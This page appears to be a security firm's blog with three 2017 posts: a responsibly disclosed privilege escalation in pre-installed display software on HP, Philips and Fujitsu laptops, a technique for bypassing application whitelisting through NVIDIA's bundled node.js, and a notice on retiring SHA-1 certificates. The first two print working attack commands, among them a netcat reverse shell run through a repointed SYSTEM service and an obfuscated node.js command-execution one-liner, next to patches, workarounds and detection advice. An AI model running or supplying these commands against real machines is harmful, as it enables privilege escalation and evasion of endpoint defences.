Tuesday, April 25, 2017

What unites HP, Philips and Fujitsu? One service and millions of vulnerable devices.

Yet another Windows service privilege escalation?

During Windows client audits, it is quite common to look for a way to escalate privileges first, in order to widen the attack surface and prepare for more sophisticated attacks (lateral movement, privilege escalation, rinse and repeat). Besides known exploits in various kinds of software, it is always worth checking for the low-hanging fruit on the privilege escalation tree. Those sweet fruits include weak file and folder permissions, unquoted service paths, or, as described in this blog post, weak service permissions, all of which can lead to privilege escalation on Windows machines.

Those low-hanging fruits appear on a regular basis in the life of a penetration tester, and they are normally not that sophisticated from a technical perspective.

The identified vulnerable Windows service is pre-installed on millions of laptops, disguised as branded bloatware*. This changes a lot, because the privilege escalation is no longer limited to a single misconfigured device in a random company environment.

* The [...] term bloatware is also commonly used to refer to preinstalled software on a device, usually included by the hardware manufacturer, that is mostly unwanted by the purchaser.

Bloatware, a common Cinderella Subject

Bloatware refers to those pieces of software that come pre-installed on your devices and that hardly anybody actually uses. Depending on the hardware vendor, some ship with a lot of bloatware, while others try to keep their devices clean. But most of these pre-installed programs have one thing in common: they are not developed by the hardware vendor itself, but rather acquired from third parties. As everybody should know, it is very important to test self-developed as well as externally developed programs before going live. It is also very important that the security requirements are bindingly declared to the contractor as early as the assignment of the application. Before going live, the contractor should be obliged to supply a test installation of the system, which can then undergo a security-related acceptance test conducted by security experts.

The past has already shown us that such 3rd party bloatware acquired by OEMs is treated like an orphaned child: at best it is reviewed and tested by security experts only fragmentarily, and in the worst case the software is rolled out without any proper security review at all. [1] [2] [3]

A virtual on screen display, that can't be dangerous, right... RIGHT?

The vulnerability described in this blog post was found in a core module of a so-called virtual on-screen display (vOSD). The purpose of a virtual on-screen display is to replace the hardware adjustment buttons on screens, notebooks, smartphones and other kinds of displays. It allows a user to quickly manage certain screen parameters (e.g. rotation, alignment, color values, gamma values, color temperature, color saturation, brightness) with a simple piece of software, instead of struggling with the hardware buttons on the display.

Portrait Displays Inc., the company responsible for developing the vulnerable software, describes their product as follows:

To get the most out of your display, it is important to set it up properly for your particular room lightning, display placement, and vision. Using the buttons on the edge of the display can be confusing, if not difficult.
Display Tune's OSD Enhancement takes all of the display's button functions and transfers them to the screen, where simple buttons and sliders make screen adjustments a breeze.

That doesn't sound too dangerous, right? Changing the colors of a display is nothing an attacker can use against a single PC or a whole company environment. That is probably exactly what some big OEMs thought as well when acquiring the vulnerable software. May he be shamed who thinks badly of it.


The exploitation itself is not too special, so there is nothing new to see here. For the sake of completeness, the way the vulnerability was discovered and exploited is described below.

To identify the vulnerability, the permissions of the Portrait Displays SDK service, which Portrait Displays Inc. packages for various OEMs as a core component of its virtual on-screen displays, were retrieved with the built-in Windows command "sc". The output of the command for the vulnerable service can be seen below:






By "converting" [4] [5] the Security Descriptor Definition Language (SDDL) output into human-readable form, it is possible to identify the following permissions for the PdiService:

RW NT AUTHORITY\Authenticated Users
RW BUILTIN\Administrators

Because every authenticated user has write access to the service configuration, an attacker is able to execute arbitrary code by changing the service's binary path. Moreover, the PdiService is executed with SYSTEM privileges, so this results in a full privilege escalation.
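The SDDL-to-permissions step above can be sketched in a few lines of Python. The right codes and trustee abbreviations below are the documented SDDL ones [4] [5]; the descriptor string is an illustrative example, not the exact output of "sc sdshow pdiservice":

```python
import re

# Subset of SDDL service access rights and trustee abbreviations
# (per the Microsoft SDDL documentation referenced above [4] [5]).
RIGHTS = {
    "CC": "query config",         "DC": "change config",
    "LC": "query status",         "SW": "enumerate dependents",
    "RP": "start",                "WP": "stop",
    "DT": "pause/continue",       "LO": "interrogate",
    "CR": "user-defined control", "RC": "read permissions",
    "SD": "delete",               "WD": "change permissions",
    "WO": "change owner",
}
TRUSTEES = {
    "AU": "NT AUTHORITY\\Authenticated Users",
    "BA": "BUILTIN\\Administrators",
    "SY": "NT AUTHORITY\\SYSTEM",
}

def decode_sddl(sddl):
    """Return (trustee, rights) pairs for each access-allowed ACE in a DACL."""
    aces = []
    for rights, sid in re.findall(r"\(A;;([A-Z]+);;;([A-Z]+)\)", sddl):
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append((TRUSTEES.get(sid, sid), [RIGHTS.get(c, c) for c in codes]))
    return aces

# Illustrative descriptor: Authenticated Users may change the service
# configuration (DC), which is exactly what makes such a service exploitable.
example = "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
for trustee, rights in decode_sddl(example):
    print(trustee, "->", ", ".join(rights))
```

If "change config" shows up for Authenticated Users, any logged-in user can repoint the service binary, which is the core of the vulnerability described here.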

The workflow to execute arbitrary code with elevated SYSTEM privileges is as follows:

1) Stop Service

sc stop pdiservice

2) Alter service binary path

sc config pdiservice binpath= "C:\nc.exe -nv $IP $PORT -e C:\WINDOWS\System32\cmd.exe"

3) Start Service

sc start pdiservice

4) Profit

The possibilities are endless: other useful payloads include creating new users, adding users to groups, changing privileges, and so on. All of these commands are executed with SYSTEM privileges.

The above commands were executed by the "sectester" user, a low-privileged standard user without administrative rights. As the last figure shows, the user successfully escalated his privileges to SYSTEM.

One service to rule them all

This is not the first time that pre-shipped bloatware has contained built-in vulnerabilities or "undocumented features" [1] [2] [3].
It is quite remarkable that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security. The affected companies are worth multiple billions, yet apparently cannot spare a few thousand euros/dollars/yen to conduct a proper security review of the software and services they acquire from third parties. This vulnerability would have been identified immediately if security experts had conducted a thorough review of the application/service before devices shipped with this software. Even automated vulnerability scans detect such weak service permissions [6] [7].

The problem is not limited to the service described in this blog post. A lot of other services from big players are affected as well, but those vulnerabilities are usually downplayed or simply ignored (e.g. Dell's DellRctlService [8] and the Lansweeper service [9] are/were affected by the exact same vulnerability, but hardly anyone noticed and the issue was downplayed).


There are two ways to get rid of the vulnerability.

Vendor Patch

The vendor provided a patch for the vulnerable software on their website: http://www.portrait.com/securityupdate.html


Workaround

To quickly get rid of the vulnerability, the permissions of the service can be altered with the built-in Windows command "sc". To completely remove the permissions of the "Authenticated Users" group, "sc sdset pdiservice" can be used to set a security descriptor that no longer contains an access control entry for this group.

This results in the following set of permissions:

RW BUILTIN\Administrators
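The effect of such a hardening step can be modeled as stripping every ACE granted to the Authenticated Users trustee (AU) from the service's security descriptor. The descriptor string in this sketch is only an illustrative example, not the actual PdiService descriptor:

```python
import re

def drop_authenticated_users(sddl):
    """Remove every ACE whose trustee is Authenticated Users (AU)."""
    return re.sub(r"\([^)]*;AU\)", "", sddl)

# Illustrative descriptor: after hardening, only the Administrators ACE remains.
hardened = drop_authenticated_users(
    "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)")
print(hardened)  # D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
```

The resulting string is what would then be applied with "sc sdset".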

Affected Vendors/Software

The vendor confirmed that at least the following binaries are vulnerable:

Fujitsu DisplayView Click Version 6.0

build id: dtune-fts-R2014-04-22-1630-07
Version 6.01
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3, build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by a patch in Version 5.9, build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium, versions with the issue: 2.23

build id: dtune-plp-R2013-08-12-1215-13
Version 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26, build id: dtune-plp-R2014-11-14-1813-07

The following pieces of software also use the Portrait Displays SDK service; SEC Consult did not evaluate whether these packages are vulnerable as well:

-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6

Final Words

In the end, we want to thank Portrait Displays Inc. for resolving the issue in a professional way, responding regularly with continuous updates about the current state of the patch, and recognizing that this vulnerability is critical instead of playing it down like other vendors have done in the past [8] [9]. This is crucial for a well-working responsible disclosure process. Please review the vendor communication timeline for more details [10].

We would also like to thank CERT/CC for setting up the encrypted communication channel between Portrait Displays Inc. and us, as well as for providing a CVE (CVE-2017-3210) and a CERT VU (http://www.kb.cert.org/vuls).

This research was done by Werner Schober on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://sec-consult.com/en/Career.htm


[1] https://duo.com/blog/out-of-box-exploitation-a-security-analysis-of-oem-updaters

[2] https://www.kb.cert.org/vuls/id/294607

[3] https://forums.lenovo.com/t5/Security-Malware/Potentially-Unwanted-Program-Superfish-VisualDiscovery/m-p/1860408#M1697
[4] https://msdn.microsoft.com/en-us/library/windows/desktop/aa379567(v=vs.85).aspx

[5] https://msdn.microsoft.com/en-us/library/windows/desktop/aa379570(v=vs.85).aspx

[6] https://www.tenable.com/plugins/index.php?view=single&id=65057

[7] https://github.com/PowerShellMafia/PowerSploit/tree/dev/Privesc

[8] http://en.community.dell.com/support-forums/software-os/f/4997/t/19992760

[9] https://www.lansweeper.com/forum/yaf_postst7658_ACL-on-Lansweeper-Service-Folder--import-folder.aspx#post32119

[10] https://sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170425-0_Portrait_Displays_SDK_Privilege_Escalation_v10.txt 

Thursday, April 20, 2017

Abusing NVIDIA's node.js to bypass application whitelisting

Application Whitelisting

Application whitelisting is an important security concept which can be found in many environments during penetration tests. The basic idea is to create a whitelist of allowed applications and then permit only the execution of applications found in that whitelist. This prevents the execution of dropped malware and therefore increases the overall security of the system and the network.

A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.

SEC Consult Vulnerability Lab has been doing research in this area for several years; bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].

Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.

Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].

NVIDIA's node.js

During quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:

%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe

This is a renamed version of node.js (but signed by NVIDIA Corporation), which can be verified via the metadata of the file:

That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.

Nowadays, the most common technique to bypass application whitelisting is to start PowerShell, because the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft, and it can be found on all newer systems. However, it is also the first binary that administrators remove from the whitelist; moreover, PowerShell v5 provides very good logging (attack detection and forensics), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode, and antivirus solutions monitor malicious invocations of PowerShell.

Nearly the same advantages can be achieved by abusing NVIDIA's node.js if the target system has these drivers installed. It can be started in interactive mode, which means that scripts can be passed via a pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:

echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i 

From an attacker's perspective, this opens up two possibilities: either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting, or to reflectively load an executable into the node.js process in order to run the malicious binary on behalf of the signed process), or write the complete malware in node.js. Both options have the advantage that the running process is signed and therefore bypasses antivirus systems (reputation-based algorithms) by default.

Writing malware completely in node.js has the nice side effect that NVIDIA already installs addons with useful functions such as:
  • WebcamEnable (NvSpCapsAPINode.node) 
  • ManualRecordEnable (NvSpCapsAPINode.node) 
  • GetDesktopCaptureSupport (NvSpCapsAPINode.node) 
  • SetMicSettings (NvSpCapsAPINode.node) 
  • RecordingPaths (NvSpCapsAPINode.node) 
  • CaptureScreenshot (NvCameraAPINode.node) 
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:

Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]

That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.

To load such an addon, the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it is also possible to load any .dll file this way (an error will be thrown, but DllMain gets executed):


A drawback of the reflective DLL injection attack is that it requires one file write, because, as far as I know, node.js does not support executing modules from memory (or directly accessing the Windows API). It is therefore required to drop one loader module to disk and then load this module, which acts as a wrapper for the Windows API. Using the dropped module, the script can then access the Windows API and reflectively load any executable/library into the signed node.js process (a concept similar to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).

Please note that the above approach drops one file to disk; however, this file is only a legitimate node.js module. The real malware can afterwards be loaded from memory via the loader module and is therefore never written to disk.

The file can be dropped to the following location which is writeable by standard users:

%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\

Overcoming the "issue" of the one file write is not trivial. It is not really a big problem (e.g. the dropped file is not malicious and will not be detected by an antivirus solution); however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways, depending on the product and configuration in use. For example, it is possible to abuse the AppLocker default rules, which allow execution of all files in %windir%\*. Therefore, an attacker can drop his node module into the writeable tasks folder:

There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator denies all these writeable locations by adding exclude rules for them. Is the system now secure?

The answer is NO, because Alternate Data Streams (ADS) can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on that folder (for an explanation of ADS see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions/monitoring rules. Let's say we drop the following file:

All common APIs return %windir% as the base folder rather than %windir%\tracing, which makes the module look like a file from the normal Windows folder (to which a normal user does not have write permissions!).

This trick is already known and was described by James Forshaw in a different context (unfortunately, I could not find his original post on it, but in general all his posts are highly recommended).

What does that mean? Even if an administrator added additional exclude rules to the default rules to block writeable folders, we can still bypass AppLocker with the ADS.

The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations): 

Here, Microsoft's control.exe is used to load the library; however, it can also be loaded via node.js (and the ADS itself can be created using the fs module).

Another possibility is to overwrite an existing library if application whitelisting was configured based only on paths (which is often done because of updates).

Here are some additional methods which I tried in order to avoid the file write altogether (i.e. to work with in-memory files):

UNC paths:

The code first tries to load the addon via SMB (port 445) and uses WebDAV (port 80) as a fallback. Since outgoing SMB traffic is forbidden in most environments, it would be good to access the data directly via WebDAV (it is possible to create a WebDAV server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:


A good explanation why these paths work can be found at [8].

However, both path formats are not allowed inside node.js (the code later calls lstat, which throws a file-not-found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless for achieving file-less exploitation.

Another idea was to abuse named pipes, which can be created from node.js code; however, named pipes are not seekable, and therefore LoadLibrary() / require() fail.

Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates, in most cases, an in-memory file; however, node.js does not provide a way to pass these flags from JavaScript code.

For people wondering why NVIDIA ships with node.js

At startup, NVIDIA starts a webserver via node.js (providing functionality like the above-mentioned webcam control) on a randomized port. To protect against attacks, a random secret cookie is created and must be passed in order to interact with the service. The information about the used port number and cookie value can be extracted from the following file:

%localappdata%\NVIDIA Corporation\NvNode\nodejs.json 


For red teamers, the recommended approach is to use the fs module from node.js to write a loader addon to disk, which gives JavaScript code access to the Microsoft Windows API. The JavaScript code can then download the (encrypted) payload from the Internet and, via the Windows API, reflectively load the payload into its own process space and execute it.

Node.js itself can be started via one of the publicly known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash and so on.

Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to further hide:

echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i
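The octal escape sequences in the command line above decode to plain strings. Python happens to interpret these octal escapes the same way JavaScript does, so a quick deobfuscation (using the exact escape values from the command above) reveals the payload:

```python
# The four octal-escaped strings from the obfuscated command line above.
encoded = [
    '\162\145\161\165\151\162\145',
    '\143\150\151\154\144\137\160\162\157\143\145\163\163',
    '\145\170\145\143',
    '\143\141\154\143',
]
print(encoded)  # ['require', 'child_process', 'exec', 'calc']
# i.e. global['require']('child_process')['exec']('calc')
```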

Such code can be used as a persistence mechanism (auto start), because the called binary is signed by NVIDIA and will be considered safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection; however, in my opinion such tricks are a telltale sign in themselves.

For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and binary contains Node.js strings) during client security audits to identify other vendors which ship node.js to clients.
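Such a hunt can be sketched as a small script. The 10 MB threshold and the "Node.js" marker string come from the recommendation above; the .exe extension filter and the scanned path are assumptions made for this sketch:

```python
import os

def find_nodejs_binaries(root, min_size=10 * 1024 * 1024):
    """Walk `root` and report .exe files that look like bundled node.js:
    larger than ~10 MB and containing a telltale b'Node.js' marker string."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".exe"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) < min_size:
                    continue
                with open(path, "rb") as f:
                    if b"Node.js" in f.read():
                        hits.append(path)
            except OSError:
                continue  # unreadable file, skip it
    return hits

# Example invocation (the path is just an example):
# find_nodejs_binaries(r"C:\Program Files (x86)")
```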

For blue teamers, it is recommended to remove the file from the whitelist (if possible) or at least to monitor its invocation.

This research was done by René Freingruber (@ReneFreingruber) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://sec-consult.com/en/Career.htm


[1] https://cansecwest.com/slides/2016/CSW2016_Freingruber_Bypassing_Application_Whitelisting.pdf

[2] http://subt0x10.blogspot.co.at/

[3] https://enigma0x3.net/

[4] http://www.exploit-monday.com

[5] https://nodejs.org/api/addons.html 

Wednesday, January 18, 2017

Last call to replace SHA-1 certificates


All major browsers will stop accepting SHA-1 certificates in January/February 2017. An average user will then not be able to distinguish between an invalid certificate (e.g. a certificate from an attacker) and a valid certificate that uses a SHA-1 hash. Effectively, this means that Internet services that still use SHA-1 certificates will become unusable for a large portion of users within the next few weeks.

Specifically, each major browser vendor has announced its own cut-off date; for IE11 and Edge, for example, it is 2017-02-14.

Browser vendors have provided ways to still use SHA-1 certificates issued by an internal CA (often used for internal services like webmail). However, this is only a temporary measure, as Google Chrome, for example, will remove support for SHA-1 entirely in 2019 at the latest.

The following Censys query demonstrates that there are still many TLS services world-wide affected by this. The query includes all HTTPS services with certificates that a) have not expired, b) would otherwise be trusted by browsers, and c) are signed using the SHA-1 hash algorithm:

Source: censys.io

Is this necessary?

By disabling trust in SHA-1 certificates, browser vendors are trying to prevent a situation similar to what happened in 2008. Well before 2008, it was commonly known that the MD5 hash algorithm exhibits serious weaknesses. Despite that fact, many certificate authorities issued MD5 certificates and major browsers accepted them. The attacks against MD5 continuously improved over the years, until in 2008 a group of researchers used the weaknesses in MD5 to successfully forge a certificate. Using this certificate, the researchers were able to issue arbitrary certificates for any service on the Internet. We now know that any criminal organisation that had conducted the same research and implemented a similar attack could have successfully intercepted arbitrary TLS connections (e.g. HTTPS) on the Internet.

There are many parallels between the situation then and the situation we now have with SHA-1. The first weaknesses in SHA-1 were published in 2005. Since then, the attacks on weaknesses in SHA-1 have continuously been improved. In 2015, researchers estimated that finding a collision in SHA-1 would cost between $75,000 and $120,000. While a collision does not necessarily allow for a practical attack, being able to find one severely undermines the security of SHA-1. It is very hard to estimate how long it will take to advance the current attacks to the point where a certificate can be forged. Moreover, it is possible that organisations outside academia already have knowledge of even more advanced attacks against SHA-1.

Therefore, it is necessary for browser vendors to disallow the use of SHA-1 certificates now, before we are in a situation similar to the situation in 2008. Google even goes so far as to warn against "the imminent possibility of attacks that could directly impact the integrity of the Web PKI".

The abandonment of the SHA-1 hash algorithm also affects code signing certificates. Although Windows code signing certificates with SHA-1 signatures can still be obtained, certificate authorities would probably be forced to revoke all SHA-1 certificates once a practical attack becomes known. This especially affects versions of Microsoft Windows that do not support any other hash algorithm for code signing (i.e. legacy Windows versions such as XP SP3, Windows Server 2008 and Windows Vista).


As a countermeasure, we recommend replacing the affected certificates immediately!

If the certificates are not replaced by 2017-02-14 (the date for IE11/Edge; other browsers enforce the change even earlier), a large portion of users will not be able to access the affected services.

To test whether your Internet services are affected by this issue or by other problems in the TLS configuration, SSL Labs provides a very useful online test.
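A rough self-made check is also possible with nothing but the Python standard library: the sketch below fetches a server's certificate and searches the raw DER bytes for the sha1WithRSAEncryption OID. This is only a heuristic (a proper check should fully parse the certificate), and the host name in the comment is just an example:

```python
import socket
import ssl

# DER encoding of OID 1.2.840.113549.1.1.5 (sha1WithRSAEncryption).
SHA1_RSA_OID = bytes.fromhex("06092a864886f70d010105")

def fetch_cert_der(host, port=443):
    """Fetch the peer certificate in raw DER form (validation disabled,
    since we want to inspect even otherwise-distrusted certificates)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)

def looks_sha1_signed(der_bytes):
    """Heuristic: does the DER blob contain the SHA-1/RSA signature OID?"""
    return SHA1_RSA_OID in der_bytes

# Example (host name is just an example):
# print(looks_sha1_signed(fetch_cert_der("www.example.com")))
```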